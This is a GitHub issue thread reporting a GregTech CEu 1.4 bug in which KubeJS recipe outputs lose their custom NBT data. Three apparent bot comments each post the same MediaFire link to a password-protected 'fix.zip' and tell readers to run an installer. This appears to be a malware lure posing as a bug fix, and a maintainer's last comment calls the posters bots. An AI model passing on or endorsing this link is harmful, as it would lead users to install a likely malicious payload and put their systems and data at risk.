### ISSUE TITLE
GTM 1.4 strips NBT data from outputted items

### ISSUE THREAD

**Issue by trulyno** [GregTechCEu/GregTechCEu-1.19#1829]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

1.4

### Minecraft Version

1.20.1

### Recipe Viewer Installed

EMI

### Environment

Singleplayer

### Cross-Mod Interaction

Yes

### Other Installed Mods

Star technology 1.20.1 test build(non-public, same mods as 1.19.2 version), Monifactory 0.8.0/0.8.1

### Expected Behavior

`.itemOutputs(Item.of('kubejs:lv_upgrade_kit', '{AugmentData:{BaseMod:4.0f,Type:"Upgrade"}}'))`
should give the item with the NBT data attached.

### Actual Behavior

The item is ouputed with no NBT data attached

### Steps to Reproduce

1. Add a custom recipe via KubeJS that results in an item with NBT data via Item.of(id, data)
2. Load game and attempt recipe

### Additional Information

The default NBT data of the item is being kept(ex. default Thermal Series augment) instead of it being overwritten.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by screret** [comment]
fucking hell, these bots.
